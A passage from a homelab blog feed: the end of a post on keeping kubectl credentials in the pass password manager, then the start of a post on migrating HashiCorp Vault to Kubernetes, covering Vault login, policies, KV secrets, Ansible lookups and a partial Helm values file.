</span></span></code></pre></div><p>Then I added the values to an <a href="https://kubernetes.io/docs/reference/config-api/client-authentication.v1beta1/#client-authentication-k8s-io-v1beta1-ExecCredential">ExecCredential</a>
I stored in pass by running this command first:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>pass edit k8s/credentials
</span></span></code></pre></div><p>This will open the editor in the <code>EDITOR</code> environment variable. Then I pasted
this into it:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;apiVersion&#34;</span>: <span style="color:#e6db74">&#34;client.authentication.k8s.io/v1&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;kind&#34;</span>: <span style="color:#e6db74">&#34;ExecCredential&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;status&#34;</span>: {
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;clientCertificateData&#34;</span>: <span style="color:#e6db74">&#34;-----BEGIN CERTIFICATE-----\n...\n-----END CERTIFICATE-----&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;clientKeyData&#34;</span>: <span style="color:#e6db74">&#34;-----BEGIN RSA PRIVATE KEY-----\n...\n-----END RSA PRIVATE KEY-----&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>I replaced the <code>clientCertificateData</code> with the content of the <code>client-cert</code>
file extracted with the previous command and the <code>clientKeyData</code> with the
content of the <code>client-key</code> file. Finally, the entire file content should be
squashed into a single line of text, and then the editor can be closed.</p>
<p>If everything worked as expected, pass has now stored that file content at
<code>~/.password-store/k8s/credentials</code>, encrypted with the public key given in the
<code>pass init</code> command. Try it out by running this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>pass show k8s/credentials
</span></span></code></pre></div><p>If you haven&rsquo;t run any commands which require decryption up to now, a popup should
appear from your pinentry program asking you to unlock your GnuPG private key.
This will even appear when you&rsquo;ve previously unlocked that same private key
for local use on your desktop machine, as GnuPG treats the local and remote
machine as two different instances, for security reasons.</p>
<p>The final step is to adapt the <code>~/.kube/config</code> file to use the credentials from
pass. For that, I opened the file and edited it to look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">clusters</span>:
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">cluster</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">certificate-authority-data</span>: <span style="color:#ae81ff">&lt;Cluster CA CERT&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">server</span>: <span style="color:#ae81ff">https://k8s.example.com:6443</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-kube-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">contexts</span>:
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">context</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cluster</span>: <span style="color:#ae81ff">my-kube-cluster</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">user</span>: <span style="color:#ae81ff">my-kube-user</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-kube-user@my-kube-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">current-context</span>: <span style="color:#ae81ff">my-kube-user@my-kube-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Config</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">preferences</span>: {}
</span></span><span style="display:flex;"><span><span style="color:#f92672">users</span>:
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-kube-user</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">user</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">exec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">client.authentication.k8s.io/v1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>: <span style="color:#ae81ff">pass</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">show</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">k8s/credentials</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">interactiveMode</span>: <span style="color:#ae81ff">IfAvailable</span>
</span></span></code></pre></div><p>The only change necessary is in the <code>users</code> array, where the <code>user:</code> entry for
your user should be changed to contain the <code>exec</code> section shown, instead of the
<code>client-certificate-data</code> and <code>client-key-data</code> entries.</p>
<p>And with that, kubectl will execute the command <code>pass show k8s/credentials</code>
to access the credentials. And this doesn&rsquo;t just work for kubectl, but I&rsquo;ve also
tested it with the <a href="https://docs.ansible.com/ansible/latest/collections/kubernetes/core/docsite/kubernetes_scenarios/k8s_intro.html">Ansible k8s modules</a>.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 24: Migrating Vault to Kubernetes</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-24-vault/</link>
      <pubDate>Mon, 07 Apr 2025 20:41:41 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-24-vault/</guid>
      <description>Migrating my baremetal Vault to the Kubernetes cluster.</description>
      <content:encoded><![CDATA[<p>Wherein I migrate my HashiCorp Vault instance to the Kubernetes cluster.</p>
<p>This is part 25 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>Look at all this Yak wool. That&rsquo;s how much it takes to migrate <a href="https://www.vaultproject.io/">Vault</a> from
baremetal to a Kubernetes deployment. I&rsquo;ve been going back and forth for quite
a while, trying to decide what to do with my Vault instance. It&rsquo;s the one piece
of HashiCorp software I do not currently plan to get rid of. But there was a
problem: My Vault, or rather the High Availability nature of it, relied on
HashiCorp&rsquo;s <a href="https://www.consul.io/">Consul</a> and its DNS service discovery
functionality. And while I did want to keep Vault, I did not want to keep
Consul. And I also didn&rsquo;t really want to introduce some other sort of method,
like <a href="https://www.haproxy.org/">HAProxy</a>.</p>
<p>In the end, I sat down and thought quite hard for quite a while, mostly
thinking about potential reasons for why I should not move Vault to the Kubernetes
cluster. My main worry is bootstrapping - what happens if my entire Homelab goes
down, unplanned, and all at once? Be it because I stumble over the absolutely
wrong cable, or because my oven develops a short again and throws the main fuse.
Could I still get my Homelab back up and do any massaging it might need?</p>
<p>I ended up deciding that Vault on Kubernetes should be fine. All Kubernetes
Secrets are synced into the cluster anyway, and any other secrets I might need
also live in my password manager. It should be fine. Watch this space for the
day I find out what I overlooked. &#x1f605;</p>
<p>And thus began the Yak shaving.</p>
<h2 id="vault">Vault</h2>
<p>But before we start onto that mountain of wool, let&rsquo;s take a short detour and
look at what Vault is and what I use it for. Brought down to the simplest terms,
HashiCorp&rsquo;s Vault is an API server for secrets of many, many different kinds.
It supports everything from simple key-value secrets to PKI certificates.
It can also serve short-lived tokens, including for HashiCorp&rsquo;s other products
like Consul or Nomad. I used it for a number of things over the years.</p>
<p>The most important part of it is the <a href="https://developer.hashicorp.com/vault/docs/secrets/kv">KV store</a>
for me. It stores all manner of passwords, keys and certificates, like my public
cert. And it makes all of those available, given proper authorization, over HTTP.
I use secrets from this store for my Ansible playbooks, the Mastodon secrets via
<a href="https://external-secrets.io/latest/">external-secrets</a> in my Kubernetes cluster
and in my image generation setup for new hosts as well.
Support for it is very widespread as well. In HashiCorp&rsquo;s own tools of course,
but also in other tools like Ansible, where you shouldn&rsquo;t confuse it with
Ansible&rsquo;s own Vault secret store.</p>
<p>In the past, I also used the <a href="https://developer.hashicorp.com/vault/docs/secrets/nomad">Nomad secrets engine</a>
to get a short-lived token for Nomad API access for my backup solution.</p>
<p>Another big use case for me is as an internal, self-signed CA. During my Nomad/Vault/Consul
cluster days, this was pretty important functionality, because those self-signed
certs were used by all three components of my Homelab to secure their HTTPS
communication. I&rsquo;ve even gone to the length of installing the CA on all of my
devices, so I don&rsquo;t get any untrusted certificate warnings when accessing
services secured with that CA.
Since the introduction of Kubernetes, I&rsquo;m not using the Homelab CA quite as
much, but there are still a few internal things secured with it.</p>
<p>For a short while, I even considered using Vault as my OIDC identity provider,
but in the end I decided against it. My main reason for that was that I would
have needed to hang my internal secret store into the public internet, because
I intended to use OIDC for some public sites. And even though I&rsquo;ve got no reason
to distrust HashiCorp&rsquo;s security practices, and I could have only made certain
paths publicly accessible, I decided against it.</p>
<p>So what does working with Vault actually look like? The main interface is the
Vault CLI executable. You can control anything you need from the command line.
But it also provides a WebUI, if that&rsquo;s more your cup of tea. I never bothered
with it.</p>
<p>The first step of working with Vault is to obtain a token for all further tasks.
For this, Vault offers <a href="https://developer.hashicorp.com/vault/docs/auth">a plethora</a>
of auth methods, ranging from the good old username/password to OIDC or TLS certs.
I&rsquo;m using the <a href="https://developer.hashicorp.com/vault/docs/auth/userpass">userpass</a>
method, which is just good old username+password. It&rsquo;s comfortable for me, I can
use my password manager and just copy+paste the password in. It looks something
like this:</p>
<pre tabindex="0"><code class="language-shel" data-lang="shel">vault login -method=userpass username=myuser
Password (will be hidden):
Success! You are now authenticated. The token information displayed below
is already stored in the token helper. You do NOT need to run &#34;vault login&#34;
again. Future Vault requests will automatically use this token.

Key                    Value
---                    -----
token                  hvs.CAESII0RlV4BS_5_A2q8mIpzYxiye0XoE-_Vvlb0YIAYfl-6Gh4KHGh2cy5sSmpvZk5QMXN2QW0wZ0c0R1A3cXV3TkQ
token_accessor         5ofJhWq55yZGOk6CJVRyBacd
token_duration         4h
token_renewable        true
token_policies         [&#34;admin&#34; &#34;default&#34;]
identity_policies      []
policies               [&#34;admin&#34; &#34;default&#34;]
token_meta_username    myuser
</code></pre><p>Don&rsquo;t worry, this token has long since expired. &#x1f642;
When you use <code>vault login</code>, Vault automatically puts the received token into a
file in <code>~/.vault-token</code>. And the <code>vault</code> CLI as well as other things with Vault
integration check that path as well.</p>
<p>As you&rsquo;d expect from a properly secured application, the tokens you&rsquo;re getting
have a restricted TTL. How long a token is initially valid can be configured,
in addition to enabling token renewal and defining an upper bound on how long
a token can live under any circumstances.</p>
<p>Then there&rsquo;s also the policies. Those define what the holder of a token can
actually do with it. In this case, I&rsquo;m having the <code>default</code> and <code>admin</code> policies.
The <code>default</code> policy mostly allows the holder to access information about the
token they&rsquo;re using, while <code>admin</code> is my admin policy, allowing full access to
Vault. It looks something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;sys/health&#34;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;read&#34;, &#34;sudo&#34;</span>]
</span></span><span style="display:flex;"><span>}<span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># Create and manage ACL policies broadly across Vault
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># List existing policies
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;sys/policies/acl&#34;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;list&#34;</span>]
</span></span><span style="display:flex;"><span>}<span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># Create and manage ACL policies
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;sys/policies/acl/*&#34;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;create&#34;, &#34;read&#34;, &#34;update&#34;, &#34;delete&#34;, &#34;list&#34;, &#34;sudo&#34;</span>]
</span></span><span style="display:flex;"><span>}<span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># Enable and manage authentication methods broadly across Vault
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># Manage auth methods broadly across Vault
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;auth/*&#34;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;create&#34;, &#34;read&#34;, &#34;update&#34;, &#34;delete&#34;, &#34;list&#34;, &#34;sudo&#34;</span>]
</span></span><span style="display:flex;"><span>}<span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># Create, update, and delete auth methods
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;sys/auth/*&#34;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;create&#34;, &#34;update&#34;, &#34;delete&#34;, &#34;sudo&#34;</span>]
</span></span><span style="display:flex;"><span>}<span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># List auth methods
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;sys/auth&#34;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;read&#34;</span>]
</span></span><span style="display:flex;"><span>}<span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># Enable and manage the key/value secrets engine at `secret/` path
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># List, create, update, and delete key/value secrets
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;secret/*&#34;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;create&#34;, &#34;read&#34;, &#34;update&#34;, &#34;delete&#34;, &#34;list&#34;, &#34;sudo&#34;</span>]
</span></span><span style="display:flex;"><span>}<span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># Manage secrets engines
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;sys/mounts/*&#34;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;create&#34;, &#34;read&#34;, &#34;update&#34;, &#34;delete&#34;, &#34;list&#34;, &#34;sudo&#34;</span>]
</span></span><span style="display:flex;"><span>}<span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># Manage secrets engines
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;sys/remount&#34;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;create&#34;, &#34;read&#34;, &#34;update&#34;, &#34;delete&#34;, &#34;list&#34;, &#34;sudo&#34;</span>]
</span></span><span style="display:flex;"><span>}<span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># List existing secrets engines.
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;sys/mounts&#34;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;read&#34;</span>]
</span></span><span style="display:flex;"><span>}<span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># Homenet Root CA access
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;homenet-ca*&#34;</span> {
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [ <span style="color:#e6db74">&#34;create&#34;, &#34;read&#34;, &#34;update&#34;, &#34;delete&#34;, &#34;list&#34;, &#34;sudo&#34;</span> ]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Armed with this token, I can then for example take a look at my secrets:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault read secret/s3_users/blog
</span></span><span style="display:flex;"><span>Key                 Value
</span></span><span style="display:flex;"><span>---                 -----
</span></span><span style="display:flex;"><span>refresh_interval    768h
</span></span><span style="display:flex;"><span>access              abcde
</span></span><span style="display:flex;"><span>custom_metadata     map<span style="color:#f92672">[</span>managed-by:external-secrets<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>secret              <span style="color:#ae81ff">12345</span>
</span></span></code></pre></div><p>This is a pretty nice example, in fact. It shows that the <code>blog</code> secret consists
of two entries, <code>access</code> and <code>secret</code>, containing the standard S3 credentials.
But it also has <code>custom_metadata</code> indicating that it wasn&rsquo;t actually created
by me by hand, but was pushed into Vault via an external-secrets <a href="https://external-secrets.io/latest/api/pushsecret/">PushSecret</a>.
I&rsquo;m doing this because I need the S3 credentials for my blog in both, an Ansible
playbook I use to configure S3 buckets, and in the K8s cluster, because that&rsquo;s
where the bucket and credentials are created by Rook Ceph.</p>
<p>To put that same secret into Vault, the following command line could be used:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault kv put secret/s3_users/blog access<span style="color:#f92672">=</span>abcde secret<span style="color:#f92672">=</span><span style="color:#ae81ff">12345</span>
</span></span></code></pre></div><p>This would of course have the downside of putting the secret into the shell
history, unless a space is added at the front.
If you&rsquo;d prefer having Vault take the secret from stdin, you can run the same
command like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault kv put secret/s3_users/blog access<span style="color:#f92672">=</span>abcde secret<span style="color:#f92672">=</span>-
</span></span></code></pre></div><p>This will take the <code>access</code> key from the parameter, but for the <code>secret</code>, it
will ask you for the value, which keeps it out of the shell history.
But this approach also has a downside, because only one key can be used with
the <code>-</code> as input.
If you have more actually secret parameters, you can also put all of them into
a JSON file. I will demonstrate that later on when I migrate my Vault content
from my baremetal instance to the Kubernetes deployment.</p>
<p>If you want to use Vault values from within Ansible, I&rsquo;ve found the <a href="https://docs.ansible.com/ansible/latest/collections/community/hashi_vault/hashi_vault_lookup.html">Vault lookup</a>
pretty nice to use. It can be used  like this, to set a variable in a playbook:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Demonstration</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">demo</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">vars</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3_access</span>: <span style="color:#e6db74">&#34;{{ lookup(&#39;hashi_vault&#39;, &#39;secret=secret/s3_users/blog:access token=&#39;+vault_token+&#39; url=&#39;+vault_url) }}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3_secret</span>: <span style="color:#e6db74">&#34;{{ lookup(&#39;hashi_vault&#39;, &#39;secret=secret/s3_users/blog:secret token=&#39;+vault_token+&#39; url=&#39;+vault_url) }}&#34;</span>
</span></span></code></pre></div><p>I&rsquo;m setting the <code>vault_token</code> with Ansible&rsquo;s <a href="https://docs.ansible.com/ansible/latest/collections/ansible/builtin/file_lookup.html">file lookup</a> like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">vault_token</span>: <span style="color:#e6db74">&#34;{{ lookup(&#39;file&#39;, &#39;/home/my_user/.vault-token&#39;) }}&#34;</span>
</span></span></code></pre></div><p>And because that file is automatically updated when the <code>vault login</code> command is
used, I&rsquo;m getting the current token automatically.</p>
<p>I will go into a bit more detail about generating certificates later as part
of the Vault k8s setup.</p>
<h2 id="setting-up-the-helm-chart">Setting up the Helm chart</h2>
<p>Alright. Let the Yak shaving finally commence. First of all, it&rsquo;s notable that there is
no official way to migrate the content of an instance to another instance. So I
had to go with setting up a completely new instance of Vault on k8s, instead of
doing some sort of migration.</p>
<p>So the first step was to configure and deploy the <a href="https://github.com/hashicorp/vault-helm">official Helm chart</a>,
following <a href="https://developer.hashicorp.com/vault/tutorials/kubernetes/kubernetes-raft-deployment-guide">this guide</a>.</p>
<p>And here is the result:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">global</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tlsDisable</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">openshift</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serverTelemetry</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">prometheusOperator</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">injector</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">server</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">logLevel</span>: <span style="color:#ae81ff">debug</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">logFormat</span>: <span style="color:#ae81ff">json</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">500Mi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">500m</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">500Mi</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">readinessProbe</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;/v1/sys/health?standbyok=true&amp;sealedcode=204&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;/v1/sys/health?standbyok=true&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">initialDelaySeconds</span>: <span style="color:#ae81ff">600</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tolerations</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">effect</span>: <span style="color:#ae81ff">NoSchedule</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">key</span>: <span style="color:#ae81ff">node-role.kubernetes.io/control-plane</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">Exists</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/role</span>: <span style="color:#e6db74">&#34;controller&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">networkPolicy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">priorityClassName</span>: <span style="color:#e6db74">&#34;system-cluster-critical&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraLabels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">vault</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">vault</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">service</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">active</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">standby</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;LoadBalancer&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">externalTrafficPolicy</span>: <span style="color:#e6db74">&#34;Local&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#ae81ff">newvault.example.com</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">io.cilium/lb-ipam-ips</span>: <span style="color:#ae81ff">300.300.300.12</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">includeConfigAnnotation</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dataStorage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">size</span>: <span style="color:#e6db74">&#34;1Gi&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">auditStorage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dev</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraVolumes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">type</span>: <span style="color:#ae81ff">secret</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vault-tls-certs</span>
